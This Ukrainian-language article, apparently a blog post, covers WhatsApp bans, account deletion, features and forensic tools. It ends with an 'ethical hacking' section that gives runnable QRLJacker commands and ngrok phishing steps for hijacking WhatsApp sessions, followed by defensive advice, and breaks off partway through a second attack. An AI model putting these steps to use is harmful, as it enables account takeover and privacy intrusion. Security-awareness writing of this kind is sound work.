👉 Детальніше про те як WhatsApp обробляє користувацькі дані на офіційному сайті, а також в зведеній таблиці.

Читайте також: Які користувацькі дані збирає Facebook

За що можуть забанити в WhatsApp?

WhatsApp banned

Облікові записи користувачів можуть бути тимчасово або назавжди заблоковані за наступних умов:

  1. Повторна невдала реєстрація з номерів та IP-адрес різних країн. Зокрема з номерів телефонів, які попередньо були заблоковані WhatsApp за порушення.
  2. Неактивні облікові записи. WhatsApp перевіряє активність облікових записів кожні 30 днів і вилучають ті, які не були онлайн протягом 120 днів (детальніше).
  3. Використання неофіційних версій WhatsApp.
  4. Поширення дезінформації, неправдивих даних. WhatsApp – централізований додаток, який співпрацює з численними правохоронними органами і організаціями, що приділяють протидії дезінформації значну увагу.
  5. Публікація незаконного, непристойного, наклепницького, надокучливого або загрозливого контенту (у статусі, фото профілю чи повідомленнях), а також вмісту, який принижує або розпалює ненависть, зокрема за релігійною чи етнічною ознакою, і спонукає та заохочує до протиправних або неприйнятних дій, а також порушує Умови надання послуг. Сюди відноситься також вміст, що свідчить про сексуальне насильство, насильство над дітьми або їх експлуатацію, сцени або повідомлення про суїцид і таке подібне.
  6. Масові та автоматичні повідомлення, створення акаунтів, розсилання запрошень у групи, автоматичний набір номерів у WhatsApp. WhatsApp використовує технології машинного навчання та скарги користувачів, щоб виявляти й блокувати облікові записи, які надсилають небажані автоматичні повідомлення. Крім того, не слід створювати облікові записи або групи в неавторизований чи автоматизований спосіб і використовувати модифіковані версії WhatsApp. Докладніше про те, як WhatsApp запобігає масовому й автоматизованому розсиланню повідомлень, можна прочитати в документі “How WhatsApp Fights Bulk Messaging and Automated Behavior”.
  7. Публікація персональних, ідентифікаційних даних інших осіб без їх згоди. А також будь-яких даних, отриманих незаконним шляхом.
  8. Збирання даних в WhatsApp – парсинг, скрапінг, граббінг. Зокрема
    номери телефонів, зображення профілю та статуси.
  9. Порушення інтелектуальної власності, авторських прав.
  10. Будь-яке використання продукту WhatsApp у незаконний спосіб: продажа, ліцензування, копіювання, адаптування, змінення, поширювання. Декомпіляція і модифікація вихідного коду додатка. Створення своїх додатків на основі коду і API WhatsApp.
  11. Надсиланяя, зберігання, передавання шкідливих файлів, вірусів через WhatsApp.
  12. Неавторизований доступ до систем та інфраструктури Whatsapp, втручання в його роботу, порушення безпеки, конфіденційності, ціліснісності, доступності.
  13.  Зловживати каналами зворотного зв’язку, наприклад, надсилаючи шахрайські або безпідставні звіти чи звернення.
WhatsApp blocked accounts
Прикладм повного і часткового блокування облікового запису WhatsApp.

Якщо вважаєте, що ваш обліковий запис заблокували помилково, можете звернутися в технічну підтримку WhatsApp за вказаними контактними формами або написавши на електронну пошту support@support.whatsapp.com.

Як видалити обліковий запис в WhatsApp?

Користувачу надається право самостійно вилучити свій обліковий запис  – для цього у WhatsApp переходимо у налаштування “Settings” -> “Account”, ввести в відповідному полі свій номер й обрати пункт “Delete account”:

Як видалити свій акаунт WhatsApp

Варто зауважити, що після вилучення акаунта, копії даних користувача продовжують зберігатися на серверах WhatsApp ще 30, а в деяких випадках й 90 днів.

Рекомендується попередньо видалити усі свої канали та будь-яку іншу інформацію, щоб вона не продовжувала існувати та з’являтися в месенджері після вашого видалення.

Список функціональних можливостей WhatsApp

ℹ️ Найповніший список усіх функцій WhatsApp Messenger з детальним описом. Перевірено на OC Android 13. Актуально на момент виходу матеріалу.

  1. Канали (Channels). Кожен користувач WhatsApp може створювати канали з необмеженою кількістю підписників. Усі канали і їх контент є публічними. Кожен може знайти його і підписатись. Посилання на канали можуть індексуватися пошуковими системами. У пошуку WhatsApp зберігається 30-денна історія каналу. У каналах немає можливості залишати коментарі. Канали призначені для однобічного розповсюдження інформації. Детальніше>>
  2. Групи (Groups). Групи призначені для обговорень та публікації будь-якої інформації. Кожен користувач WhatsApp може створювати групи з максимальною кількістю учасників – 256. Групу можна прив’язати до Спільноти (Community). Підписники, учасники, адміністратори бачать номери телефону один одного. В групи можна додавати учасників, яких немає у списку ваших контактів, просто вказавши номер телефону через Group Info -> Add member -> Search name or number. Щоправда, якщо користувач захистив свій акаунт налаштуванням приватності “Заборона додавати до груп” (див. нижче), тоді ви не зможете його додати, лише особисто подати запрошення через посилання. У групі може бути скільки завгодно адміністраторів, і будь-який адміністратор може призначити іншого учасника адміністратором. Засновника групи не можна вилучити, і він залишатиметься адміністратором, доки не вийде з групи. В групах можна встановити правила доступу “Group permissions”, наприклад дозволити вступати лише після схвалення адміністратором, заборонити редагувати групу, запрошувати нових учасників, публікувати повідомлення. Ось сайт, де можна знайти публічні WhatsApp-групи за різною тематикою.
  3. Спільноти (Communities). В спільнотах, на відміну від груп, номери учасників приховуються. Як і в каналах, їх бачать лише адміни. Тому вони більш зручні з точки зору конфіденційності та підходять для публічного використання. Групи можна прив’язувати до спільнот, разом з тим добавляючи їх учасників. Налаштувань доступу тут менше, ніж в групах – можна лише обмежити хто може додавати нові групи. Максимальна кількість учасників в спільнотах становить – 256. Детальніше>>
  4. Офлайн чати. Підтримка надсилання повідомлень іншим користувачам, навіть якщо вони перебувають не в мережі. У такому випадку повідомлення тимчасово зберігаються на серверах WhatsApp у зашифрованому вигляді. Також є можливість надсилати повідомлення, якщо у вас відсутній інтернет – повідомлення в такому випадку просто стають у чергу і як тільки відновиться з’єднання з Інтернетом вони будуть автоматично відправлені отримувачу (доступно з версії 2.17.1).
  5. Відеодзвінки. Безкоштовні приватні та групові відеодзвінки до 32 осіб (доступні починаючи з Android 4.1). Є функція “Демонстрація дисплею”.  WhatsApp використовує кодек MP4 H.264 для кодування відеоданих.
  6. Відеочати. Обмін відеоповідомленнями у чаті тривалістю до 60 секунд. Для активації функції необхідно перейти в налаштування Settings -> Chats та перевести повзунок “Instant video messages” у положення увімкнено.
  7. Аудіодзвінки. Безкоштовні приватні та групові аудіодзвінки до 256 чоловік. Мінімальна швидкість Інтернет-з’єднання – 64 Kbps. WhatsApp використовує протоколи P2P (Peer-to-Peer) і SRTP (Secure Real-time Transport Protocol) для забезпечення безпеки під час обміну аудіо- та відеоданими. P2P використовується для встановлення прямих з’єднань між користувачами, що дозволяє обмінюватися даними без посередництва серверів. SRTP використовується для шифрування аудіо- та відеоданих під час їх трансляції через мережу. Це забезпечує конфіденційність та цілісність даних, що передаються, а також захист від атак, спрямованих на зміну чи перехоплення даних. WhatsApp використовує аудіокодек Opus для кодування аудіоданих (із частотою дискретизації 8 або 16 кГц).
  8. Голосові чати. Обмін голосовими аудіоповідомленнями в чаті тривалістю до 16 хвилин.
  9. Обмін файлами. WhatsApp дозволяє надсилати один одному різні типи файлів в різних форматах. Офіційно підтримуються аудіо об’ємом до 16 Мб: ogg, aac, amr, 3gp, flac, mpeg. Відео об’ємом до 16 Мб: mp4, 3gpp, avi, mkv, mov. Зображення об’ємом до 5 Мб: jpg, jpeg, png, gif (8 bit RGB/RGBA), webp (до 100 Кб). Документи будь-якого формату: txt, doc, docx, csv, xls, pptx, pdf, vcf, fb2, zip та інші об’ємом до 100 Мб.
  10. Stories-статуси (Updates -> Tap to add status update). У WhatsApp існує функція Status Update, що відрізняється від звичайного текстового статусу у профілі. Її можна використовувати для публікації Stories, що відобразиться вашій мережі контактів. Можна також пересилати повідомлення та інший контент собі в оновлення статусу. Проте ця опція вимагає увімкнених звітів про прочитання в налаштуваннях Settings -> Privacy -> Read receipts. Також підтримуються аудіо та відеостатуси тривалістю до 30 секунд. Вилучити або відреадгувати опубліковані Stories-статуси можна на вкладці Updates, натиснувши на свою аватарку ви побачите повний список усіх своїх статусів. За бажанням, їх можна опублікувати на Facebook або поділитися в чатах.
  11. Двофакторна верифікація (Settings -> Account -> Two-step verification). Задля підвищеної безпеки, WhatsApp дозволяє встановити шестизначний PIN-код та додатково за бажанням вказати Email, що потенційно унеможливить несанкціоновані повторні реєстрації за вашим номером у месенджері WhatsApp, а також допоможе відновити обліковий азпис у випадку зламу чи інших проблем. Двофакторна верифікація також може захистити у разі перевипуску й повторного використання вашої SIM-карти. Час від часу WhatsApp вимагатиме підтвердження правильного введення PIN-коду, щоб переконатися, що ви його пам’ятаєте та маєте доступ до облікового запису.
  12. Мультипристрій – режим “Компаньйон” (Link as a companion device). Ця функція дозволяє користувачу використовувати один і той самий обліковий запис WhatsApp на декількох мобільних пристроях. Для включення, необхідно встановити WhatsApp і на сторінці реєстрації обрати в правому верхньому куті додаткові налаштування (три крапки) і далі виконати вказівку, відсканувавши свій QR-код на основному мобільному пристрої. Працює подібно до веб-версії. Детальніше>>
  13. Мультиакаунт (Settings -> Account -> Add account). Дозволяє користувачу мати на одному мобільному пристрої декілька різних акаунтів WhatsApp.
  14. Сповіщення про зміну ключа безпеки співрозмовника (Security notifications on device). Ця опція дозволяє пересвідчитись, що чат із вашим співрозмовником дійсно захищений наскрізних шифруванням. Вона показує код безпеки із 60 цифр, що відповідає справжньому ключу шифрування. Якщо мобільний пристрій співрозмовника буде скомпрометовано, а обліковий запис WhatsApp зламано, або він просто перевстановить додаток, то цей код безпеки теж оновиться і автоматично користувачу надійде сповіщення. За задумом, це може покращити і застерегти вашу конфіденційність від атак “Людина по середині” (Man-in-the-Middle Attack, MITM). Детальніше>>
  15. Зміна номера (Settings -> Account -> Change number). Дозволяє користувачу змінити номер телефону, прив’язаний до його облікового запису WhatsApp, зі збереженням усіх даних, чатів, налаштувань.
  16. Експорт інформації про обліковий запис (Settings -> Account -> Request account info). Ця опція дозволяє створити звіт з інформацією про акаунт, включаючи налаштування та інші деталі. Також тут доступний аналогічний звіт для каналів, де ви є адміністратором. Звіти готуються не більше 3 дні, після чого користувач має кілька тижнів, щоб експортувати їх.
  17. Приховання активності у мережі (Settings -> Privacy -> Last seen and online). Ця функція захищає обліковий запис користувача від тайм-трекінгу та стеження. Якщо у вас увімкнено відображати активність, то сторонні користувачі зможуть відстежувати коли ви онлайн, будувати з допомогою API і додатків статистику вашої активності по дням, датам, годинам. При вимкненні цієї опції – ні ви, ні інші користувачі більше не зможете бачити статуси “Останній раз був у мережі” та “Онлайн”.
  18. Приховані чати (Chat lock). Ця функція дає можливість приховати будь-який чат та обмежити до нього доступ з допомогою PIN-коду або сканера відбитків пальця, які встановлюються на пристрої Android. Для цього необхідно перейти у будь-який чат, клікнути по імені чи назві профіля й у налаштуваннях активувати опцію “Chat lock”. Приховані таким чином чати відображатимуться на окремій вкладці “Locked chats” в меню “Chats” у месенджері. Щоб її побачити необхідно свайпнути вниз. Режим прихованих повідомлень можна повторно вимикати/вмикати. Сповіщення для таких чатів будуть знеособлюються й показуються без відображення вмісту. Треба наголосити, що функція “Chat lock” може бути активована лише на пристроях, які мають технологію відбитків пальця (потребує включеного режиму Fingerprint lock). І працює вона лише на смартфоні, в WhatsApp Desktop приховані чати відображаються як усі.
  19. Вимкнення звітів про прочитання (Settings -> Privacy -> Read receipts). Дає можливість користувачу вимкнути або увімкнути звіти про прочитання відправлених повідомлень. Однак вони вимикаються глобально, тобто ні ви, ні співрозмовник більше не бачитиме звіт про прочитання. У публічних чатах звіти ці звіти включені по замовчуванню. Варто зауважити, що ця опція немає нічого спільного зі звітом про доставку – подвійна галочка, яка відображається під повідомленням, якщо воно було успішно відправлене.
  20. Приховання фото профіля (Settings -> Privacy -> Profile photo). Користувач має змогу вимкнути відображення свого фото для всіх або тільки вибраних контактів. Замість фото буде відображатися стандартна світлина WhatsApp.
  21. Приховання опису профіля (Settings -> Privacy -> About). Аналогічно, користувач має змогу вимкнути відображення опису до свого профіля для всіх або тільки вибраних контактів.
  22. Приховання статусу профіля (Settings -> Privacy -> Status). Користувач може обрати контакти, яким дозволено або заборонено показувати його статусне повідомлення.
  23. Автозникаючі повідомлення (Settings -> Privacy -> Default message timer). Усі відправлені вами текстові і голосові повідомлення в чатах зникнуть через вибраний проміжок часу, згідно встановленого таймера: 24 год, 7 днів, 90 днів. Перейшовши в налаштування Settings -> Storage and Data -> Manage storage -> Turn on dissapearing messages можна знайти опцію “Apply timer to chats”, що дозволить застосувати таймер до всіх існуючих чатів для нових повідомлень. Однак варто розуміти, що ці повідомлення насправді не вилучаються із серверів, а просто зникають на вашому пристрої, тобто приховуються. Детальніше>>
  24. Поділитись геолокацією (Share live location). Ця функція надає додатку WhatsApp доступ до геолокації вашого пристрою в реальному часі. Користувач може ділитися в чатах своїми GPS-координатами, включаючи трекінг пересування як в Strava, показаний на Google Maps. Можна також просто поділитися конкретним місцем, наприклад закладом харчування, яке позначене на карті. Присутні різні режими відображення: Стандартний вигляд, Супутниковий, Рельєф, Показати автошляхи. Перейшовши у налаштування Settings -> Privacy -> Live location користувач може зупинити геотрекінг.
  25. Поділитись об’єктом з іншими додатками. Будь-який файл чи повідомлення можна переслати з WhatsApp в інші додатки, доступні на мобільному пристроїв. Наприклад, переслати в Gmail, Viber, SMS і т.д. Для цього потрібно обрати в чаті повідомлення і вверхну натиснути на піктограмку “Share”.
  26. Заглушка дзвінків з невідомих номерів (Settings -> Privacy -> Silence unknown callers). Користувач має змогу заглушити дзвінки з невідомих номерів. Вони будуть просто відображатися як пропущені на вкладці “Дзвінки” та у сповіщеннях.
  27. Заборона запрошувати в групи (Settings -> Privacy -> Groups). Користувач може обмежити список тих, які можуть запрошувати і додавати його в групи WhatsApp.
  28. Блокування контактів (Settings -> Privacy -> Blocked contacts). Користувач може внести у чорний список небажані контакти. Заблоковані користувачі більше не зможуть телефонувати та надсилати вам повідомлення.
  29. Доступ за відбитком пальця (Settings -> Privacy -> Fingerprint lock). Дозволяє користувачу обмежити доступ до месенджера та чатів застосовуючи відбиток пальця. Доступно лише для пристроїв, які апаратно оснащені подібною технологією.
  30. Приховання номера телефону у спільнотах та каналах WhatsApp. У публічних спільотах та каналах WhatsApp автоматично приховує номер телефону користувача для інших учасників, показуючи лише перші та останні цифри. Лише адміни бачитимуть ваш номер телефону. Але варто звернути увагу на таке: якщо ви є адміністратором спільноти, тоді іншим адмінам буде доступний ваш номер телефону. Детальніше>>.
  31. Захист IP-адреси пристрою від розкриття (Settings -> Privacy -> Advanced -> Protect IP address in calls). Дозволяє приховати IP-адресу пристрою користувача при дзвінках, використовуючи сервери WhatsApp в режимі Relay. Щоправда, це може впливати на якість зв’язку. Детальніше>>
  32. Робота через проксі-сервер (Settings -> Storage and Data -> Proxy). Допоможе вам отримати доступ до WhatsApp, якщо його заблоковано у деяких країнах, або потрібно приховати свою IP-адресу для самого WhatsApp. Детальніше>>
  33. Керування автозавантаженням медіа (Settings -> Storage and Data -> Media auto-download). Дає можливість відключити або налаштувати автоматичне завантаження контенту у месенджері на ваш пристрій. Може бути корисно, якщо на пристрої обмаль місця, або просто не хочете заовнювати накопичувач зайвими даними.
  34. Резервне копіювання чатів з підтримкою шифрування E2EE (Settings -> Chats -> Chat backup). Дозволяє включити локальне резервне копіювання чатів та захистити їх наскрізним шифруванням з доступом по паролю. Також тут доступна опція створення автоматичного бекапу за розкладом і його автоматичне зберігання в сервісі Google Drive, включаючи повідомлення, медіа та відео (на вибір).
  35. Керування завантаженим медіаконтентом в WhatsApp (Settings -> Storage and data -> Manage storage). Дозволяє користувачу аналізувати споживання дискового простору пристрою месенджером WhatsApp, показується об’єм в мегабайтах. Тут також можна вилучати завантажений вміст тих чи інших каналів, на які підписаний користувач.
  36. Керування мережевою активністю в додатку WhatsApp (Settings -> Storage and data ->Network usage). Показує докладну статистику в мегабайтах скільки трафіку спожив той чи інший сервіс WhatsApp. За бажанням можна здійснити скидання (reset) статистики.
  37. Керування історією чатів (Settings -> Chats -> Chat history). Користувач може експортувати свої чати і переслати їх, архівувати, очищати усі чати за раз (відкриті діалоги залишаються), а також повністю вилучати усі чати разом з відкритими діалогами.
  38. Перенесення  чатів (Settings -> Chats -> Transfer chats). Перенесення усіх своїх чатів без створення резервної копії в Google Drive, з одного пристрою на інший.
  39. Приховання завантажених медіа WhatsApp у галереї пристрою (Settings -> Chats -> Media visibility). Ця функція дозволяє користувачу приховати завантажені медіа через WhatsApp на своєму пристрої. Корисно з точки зору конфіденційності. До речі, цю опцію можна окремо вмикати/вимикати для будь-якого чату, просто перейшовши у детальний огляд облікового запису і вибравши “Media visibility”.
  40. Керування режимом відеоповідомлення (Settings -> Chats -> Instant video messages). Дозволяє користувачу приховати кнопку переключення між голосовими та відео повідомленнями в активному чаті/виклику.
  41. Керування сповіщеннями для каналів. Користувач може перейти у канал, на який він підписаний й натиснути біля його назви на іконку дзвіночка. Таким чином будь-які оновлення з цього каналу з’являтимуться у сповіщеннях WhatsApp. Також можна їх навпаки вимкнути.
  42. Керування історією дзвінків (Calls -> Clear call log). На вкладці “Calls” відображається історія вхідних/вихідних викликів. Її можна очистити натиснувши на три крапки в правому верхньому куті і обравши пункт “Clear call log”.
  43. Керування голосовими повідомленнями. Ви можете завантажити голосові повідомлення на свій пристрій у форматі OGG. Доступні режими пришвидшеного прослуховування у форматах: 1x, 1.5x, 2x. Також ви можете поскаржитися на аудіоповідомлення, розкривши його властивості та обравши опцію “Report”. Окрім цього присутні будь-які інші стандартні функції як для звичайного повідомлення: пересилання, додавання до списку обраних, реакції, цитування та ін.
  44. Збереження архівних чатів (Settings -> Chats -> Keep chats archived).
  45. Створення аватару (Settings -> Avatar). Дозволяє користувачу створити реалістичний мультиплікаційний автар, використовуючи різноманітні шаблони та елементи (риси обличчя, одяг, зачіска, аксесуари). Є також можливість автоматично згенерувати аватар по фотографії. За аватаром можна прикріпити різні стилі, стікери та ін. Детальніше>>
  46. Теми WhatsApp і оформлення чатів (Settings -> Chats -> Theme/Wallpaper). Дозволяє переключатись між темами – Темна/Світла, а також встановити шпалери з внутрішньої колекції WhatsApp або з локального сховища на смартфоні для своїх чатів.
  47. Форматування тексту. WhatsApp підтримує вікі-розмітку Markdown для оформлення тексту: *жирний*, _курсивний_, ~закреслений~, “`моноширинний текст“`, нумеровані списки, цитата, код. Деякі форматування присутні лише на платформах iOS та Web. Детальніше>>
  48. Зміна розміру шрифту в чатах (Settings -> Chats -> Font size).
  49. Вимкнення клавіші Enter для відправки повідомлень (Settings -> Chats -> Enter is send).
  50. Налаштування звуку сповіщень (Settings -> Notifications -> Conversation tones). Вхідні/вихідні повідомлення будуть надходити без звуків. Можна також вказати свій власний звуковий файл – окремо для приватних і групових чатів (Notification tone).
  51. Налаштування вібрації сповіщень (Settings -> Notifications -> Vibrate). Можна вмикати/вимикати вібрацію пристрою для нових сповіщень – окремо для приватних і групових чатів.
  52. Налаштування кольору сповіщень (Settings -> Notifications -> Light). Дає можливість встановити колір фону сповіщень. Доступні значення: None, White, Red, Yellow, Green, Cyan, Blue, Purple. Окремо для приватних і групових чатів.
  53. Вимкнення приорітетних сповіщень (Settings -> Notifications -> Use high priority notifications). Дозволяє вмикати/вимикати сповіщення з високим приорітетом, які з’являються вгорі екрану. Налаштовуються окремо для приватних і групових чатів.
  54. Вимкнення сповіщень про реакції (Settings -> Notifications -> Reactions notifications). Дозволяє вмикати/вимикати сповіщення про реакції до ваших повідомлень. Налаштовуються окремо для приватних і групових чатів.
  55. Налаштування рингтонів і вібрації для викликів (Settings -> Notifications -> Ringtone/Vibrate).
  56. Економія трафіку при дзвінках (Settings -> Storage and Data -> Use less data for calls). Дзвінки споживатимуть мінімум даних. Функція знадобиться, якщо у вас обмежений ліміт на мобільний інтернет.
  57. Багатомовність (Settings -> App language ->). У списку є більше 60-ти мов світу, включаючи Українську.
  58. Обрані повідомлення (Kept messages). Ця функція дозволяє кожному користувач у чаті WhatsApp позначати повідомлення міткою і зробити обраними. Такі повідомлення позбавляють таймера автовилучення та зберігаються на окремій вкладці “Kept messages”, перейти у яку можна натиснувши на ім’я профілю співрозмовника у чаті. Кожен може примусово додати або зняти позначку “Додати у вибрані”. Але якщо сам автор повідомлення зняв позначку зі свого повідомлення, то повторно її вже ніхто не зможе поставити.
  59. Повідомлення самому собі (Chats -> Message youtself). Ця опція дозволяє створити чат з самим собою і надсилати будь-яку інформацію, використовуючи його як приватний записник. У цьому чаті присутні усі функції, що й в звичайному: приховання, автозникаючі повідомлення, обрані повідомлення і т.п.
  60. Закріплення чатів вгорі списку (Chats -> Pin chat). Кожен чат можна закріпити в горі списку чатів, які відображаються на вкладці Chats. Для цього треба обрати потрібний чат і натиснути в горі по іконці закріпки. Максимально можна закріпити 3 групи. Це зручно, якщо у вас багато діалогів і щоб не загубити важливий чат, можна таким чином виділити його.
  61. Перегляд технічних деталей повідомлень. Дозволяє користувачу обрати будь-яке повідомлення у чаті, натиснути вгорі на піктограмку інформації та переглянути технічні деталі: повний текст повідомлення, дату і час доставки, чи був прочитаний.
  62. Керування реакціями повідомлення. Кожне повідомлення у WhatsApp можна оцінити, поставити лайк, позначити реацією у вигляді смайликів емодзі, яких в WhatsApp безліч і вони розбиті по численним категоріям на будь-який смак. Натиснувши на реакцію користувач може переглянути список користувачів, які залишили свої реакції.
  63. Створення посилання на приєднання до дзвінка у WhatsApp (Calls -> Create call link). Ця функція знаходить на вкладці Calls і дає можливість користувачу створити посилання за яким кожен може приєднатися до вашого відео або аудіо дзвінка (на вибір) в WhatsApp. Посилання генерується у вигляді URL формату: https://call.whatsapp.com/voice/XXXXX. Його можна переслати по чату або іншим каналам електронного зв’язку, наприклад відправити по email. Ця функція може бути корисною при конференціях. Однак варто пам’ятати, що будь-які публічні лінки індексуються пошуковими системами (перевірити можна скориставшись оператором Google – inurl:/chat.whatsapp.com).
  64. Створення ярликів чату WhatsApp на робочому столі пристрою (Add shortcut). Функція доступна для будь-яких чатів і дозволяє користувачу створити швидке посилання, яке відобразиться на головному екрані пристрою на перехід у чат.
  65. Створення опитувань з мультиполями. У кожному чаті можна натиснути на іконку скріпки і обрати опитування “Poll”.
  66. Глобальний пошук у WhatsApp. Увесь контент в WhatsApp індексується, а відтак є функція пошуку. Причому, пошук присутній всюди – шукати можна будь-що і будь-де. Це корисно, якщо у користувача велика кількість контактів і повідомлень. Пошук по повідомленням в усіх чатах можна здійснювати за конкретними категоріями: Непрочитані, Фото, Відео, Посилання, GIFки, Аудіо, Документи, Опитування. Пошук в приватному чаті за типом контенту, доступний у властивостях діалогу – пункт “Media, links, and docs”. Таким чином, швидко можна знайти та впорядкувати будь-який контент.
  67. Надсилання скарг модераторам WhatsApp. Месенджер WhatsApp дає можливість кожному користувачу поскаржитися на іншого користувача, його повідомлення або увесь чат, натиснувши на кнопку “Report”, яка доступна у властивостях діалогу або повідомлення. Надіслана скарга включатиме 5 останніх повідомлень (чату або користувача), а також відповідно усі метадані, які потрібні модераторам для аналізу. Якщо вони виявлять якесь порушення, то підозрілу групу/чат/акаунт можуть забанити, а контент вилучити.
  68. GIF-анімація, стікери, емодзі. Месенджер містить велику вбудовану колекцію емодзі, стікерів, анімованих зображень, які мають свій пошук і їх можна знаходити по ключовому слову. Емодзі дозволено вставляти у дописи, статуси, прикрашати ними ім’я свого профілю, а також використовувати як аватар профілю. Також у WhatsApp присутні стікер-паки за різною тематикою.
  69. Перегляд технічних деталей про версію клієнта WhatsApp Messenger (Settings -> Help -> App info). У цьому розділі показується точна версія додатка та повний текст усіх ліцензій, які він використовує.
  70. Запросити друга у WhatsApp (Settings -> Invite a friend). Функція дозволяє кожному надіслати посилання на завантаження WhatsApp, а також локально знайти пристрій друга з допомогою технології Android Nearby.
  71. Відсканувати або поділитися своїм QR-кодом. Функція доступна в розділі Settings, у вигляді іконки QR, поруч з зображенням профіля. Дозволяє згенерувати персональний QR-код та поділитися ним через будь-які канали зв’язку, наприклад переслати по електронній пошті (додатково також згенерується URL-посиланняя у форматі https://wa.me/qr/XXXXX), або дати відсканувати безпосередньо зі свого пристрою. Таким чином інші користувачі WhatsApp зможуть знайти та додати вас у контакти. Тут також присутній сканер QR-кодів, що дозволить відсканувати та додати іншого користувача.
  72. З’єднання зі службою технічної підтримки WhatsApp (Settings -> Help -> Contact us). Дозволяє відправити повідомлення або запитання службі технічної підтримки месенджера. При цьому зазначається, що разом з повідомленням будуть відправлені метадані пристрою користувача, а також діагностична і статистична інформація щодо вашого облікового запису. Це потрібно їм аби вирішити вашу проблему. Відповідь від Support WhatsApp надійне в чат. Детальніше>>

OSINT & FORENSICS інструменти в WhatsApp

WhatsApp OSINT

OSINT tools:

Forensic tools:

  • WhatsApp Chat Analyzer — аналізатор чатів WhatsApp;
  • WhatsApp Chat Analysis скрипт на Python для видобування історії листування WhatsApp з її подальшим аналізом з допомогою Microsoft Power BI;
  • Elcomsoft Explorer for WhatsApp — професійний комерційний інструмент для роботи з даними WhatsApp;
  • Oxygen Forensics Detective — професійний комерційний інструмент для цифрових криміналістів;
  • Oxygen Forensics SQLite Viewer — професійний комерційний інструмент для перегляду баз даних WhatsApp у форматі SQLite;
  • WhatsApp Viewer — невеликий інструмент для парсингу чатів WhatsApp з Android через msgstore.db. Підтримувані версії шифрування: crypt5, crypt7, crypt8 і crypt12;
  • WhatsApp Key DB Extractor — видобуває ключ шифрування та базу даних WhatsApp на нерутованих смартфонах;
  • Whapa — набір криміналістичних інструментів з графічним інтерфейсом для аналізу файлів WhatsApp з пристроїв Android. Усі інструменти були написані на Python 3.8 і протестовані на системах Linux, Windows і macOS.
  • WA Crypt Tools — розшифровує файли WhatsApp .crypt12, .crypt14 і .crypt15, враховуючи файл ключа або ключ із 64 символів;
  • Omni-Crypt — мобільний додаток для Android для розшифрування резервних копій WhatsApp типу .crypt9-12.

Developer Tools:

  • whatsapp-web.js — це бібліотека Node.js, яка надає можливість автоматизувати взаємодію з WhatsApp Web через програмний інтерфейс (API). Наприклад, віддалено відправляти, зчитувати повідомлення, створювати групи, налаштувати сповіщення про нові повідомлення на email та багато іншого через функції API WhatsApp;
  • open wa-automate-nodejs — NodeJS бібліотека для автоматизації роботи WhatsApp використовуючи API;
  • Geeky-WhatsApp — клієнт-серверна архітектура на базі WhatsApp.
  • UltraMsg.com — онлайн-сервіс, що надає API для WhatsApp. Цей сервіс дозволяє інтегрувати функціональність WhatsApp у різні додатки та системи. За допомогою UltraMsg.com можна автоматизувати відправку та отримання повідомлень, створювати чат-боти, обробляти вхідні повідомлення та здійснювати інші дії, пов’язані з обміном повідомленнями у WhatsApp.

Android WhatsApp apps:

  • OPUS Voice & Audio Manager — допоможе перетворити голосові повідомлення WhatsApp у файли mp3;
  • WhatsApp Voice Message Saver — додаток для збереження голосових чатів;
  • Transcriber for WhatsApp — додаток для транскрипції голосових повідомлень у WhatsApp від італійського розробника Mirko Dimartino. Української мови, на жаль, серед офіційно підтримуваних немає;
  • Transcribeme — бот для транскрипції голосових повідомлень для WhatsApp. Офіційно підтримувані мови: Іспанська, Англійська, Португальська, Французька, Італійська, Каталонська, Німецька, Арабська. Українську може перекладати не точно.
  • Happyscribe — онлайн-сервіс для транскрипції голосових повідомлень WhatsApp.
  • WhatsWeb Scanner — працює на базі Web WhatsApp, дозволяє знімати сесії WhatsApp з різних акаунтів (смартфонів) і використовувати їх на одному пристрої.

10 прикладів зламу і компрометації WhatsApp

WhatsApp Ethical Hacking

ℹ️ Усі приклади нижче приводяться виключно в навчальних цілях з метою захисту.

Перехоплення сеансу WhatsApp через QR-jacking

Суть цієї атаки полягає в отриманні/перехопленні сеансу WhatsApp через QR-код. Зловмисник через фішинг або засобами соціальної інженерії робить усе можливе, щоб жертва відсканувала його QR-код активації WhatsApp на новому пристрої, що призведе до викрадення сесії месенджера. Надалі він отримає повний доступ до облікового запису жертви.

QRjacking AttackFlow

Для проведення атаки можна скориставтися інструментом OWASP QRLJacker:

git clone https://github.com/OWASP/QRLJacking
cd QRLJacking/QRLJacker
pip install -r requirements.txt
python3 QrlJacker.py --verbose --debug
use grabber/whatsapp
set port 1387
run

Вимоги до встановлення: активний VPN (з деяких IP-адрес запити на отримання QR-коду блокуються), командний рядок Linux (бажано Kali Linux), Python 3, Selenium driver (не вище <4.10, інакше отримаєте помилку “Couldn’t open Firefox! Check the installation instructions again!”), Geckodriver для Mozilla Firefox (браузер повинен запускатися через CLI). Детальний опис встановлення і приклад команд QRLJacker тут.

Після виконаних вище команд, запуститься веб-сервер (Simple HTTP Web Server на Python) з відображенням QR-коду WhatsApp. Хакер через ngrok (ngrok http 1387), через vps або іншим способом (наприклад, через підроблену публічну точку доступу Wi-Fi) розміщує його в мережі Інтернет на фішинговому сайті й підсовує жертві.

QR-jacking in WhatsApp
Приклад перехоплення есії облікового запису WhatsApp через QR-jacking
QRPhisher
Приклад шахрайської фішингової сторінки з QR-кодом для перехоплення сесії WhatsApp.

Жертва сканує QR-код, а хакер отримує cookie сесії її месенджера і зберігає собі на комп’ютер локально. Тепер він має доступ до усієї онлайн-переписки, поки сесія жертви активна. Він може закривати, відкривати чати – це ніяк не вплине на обліковий запис і жертва про це не здогадається, якщо не подивиться у список активних сесій в налаштуваннях і не зрозуміє, що її акаунт використовується на іншому пристрої.

Примітка: Додаток QRLJacker перестав оновлюватися й деякі функції можуть не працювати. Для вирішення проблем потребується самостійне втручання в код, або оновлення збоку автора. Існують й інші подібні інструменти, наприклад EvilJack, QRLJackingJS, QRPhisher, Evil QR.

Як захиститися? Не переходити по фішинговим посиланням від незнайомих осіб, завжди перевіряти активні сесії на своєму смартфоні у налаштуваннях WhatsApp (Settings -> Linked Devices). Вилучати старі сесії на пристроях, якими не користуєтеся. Не сканувати невідомі QR-коди. Не авторизуватися на сайтах через QR-код. Критично ставитись до будь-яких закликів до дій. Не вводити і не повідомляти нікому одноразові коди. Уміти виявляти шкідливі сайти і перевіряти доменні імена. У квітні 2024 року жертвами цієї атаки стали тисячі українців.

Компрометація облікового запису WhatsApp через Linked Devices

Цей вид зламу базується на людському факторі – банальних неуважності, необізнаності та наївності жертви.

Зловмиснику потрібно під будь-яких предлогом отримати фізичний доступ – виманити телефон жертви, взяти його в свої руки та перейти у налаштування WhatsApp -> Linked Devices.

